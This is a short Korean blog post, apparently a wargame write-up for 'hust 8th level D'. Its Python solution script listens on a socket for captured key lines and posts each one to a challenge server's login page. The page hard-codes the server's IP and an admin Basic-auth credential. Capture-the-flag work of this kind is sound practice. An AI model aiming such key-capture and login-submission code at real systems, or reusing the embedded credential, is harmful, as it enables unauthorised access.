hust 8th level D - python

2009. 10. 17. 19:07

받아온 키를 한줄 씩 전송 해 봤지만 첫 줄만 보내도 패스워드를 얻을 수 있었다.


?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import struct,base64,httplib, urllib
from socket import *
svrsocket = socket(AF_INET, SOCK_STREAM)
svrsocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
svrsocket.bind(('', 7777))
svrsocket.listen(1)
conn, addr = svrsocket.accept()
i = 0
sum = ''
buf =conn.recv(1024)
#print buf
j = 0
result = []
try:
    while 1:
        if buf[j]:
            if buf[j] == '\x0a':
                j+=1
                result.append(sum)
                sum = ''
                pass
            sum += buf[j]
            j+=1
        else:
            break
except:
    pass
#print result
conn.close()
 
try:
    for x in result:
        auth = base64.b64encode("admin:21d0ac6b17066785986d4ea3dcaf2c72")
        params = urllib.urlencode({'passwd':x,'submit':'SEND+PASSWORD+KEY'})
        headers = {'Content-Type':'application/x-www-form-urlencoded','Authorization': 'Basic %s'%auth}
        conn = httplib.HTTPConnection("220.95.152.132:80")
        conn.request("POST", "/login_ok.php", params, headers)
        response = conn.getresponse()
        data = response.read()
        print data
        conn.close()
except:
    pass

'Code > Python' 카테고리의 다른 글

SendMessage by winappdbg  (0) 2013.06.12
decode captcha by python  (0) 2012.11.12
handling HTTP by python module  (0) 2011.07.04
ISEC 2009 level3 solution by winappdbg  (0) 2010.09.16

badcob Code/Python

티스토리툴바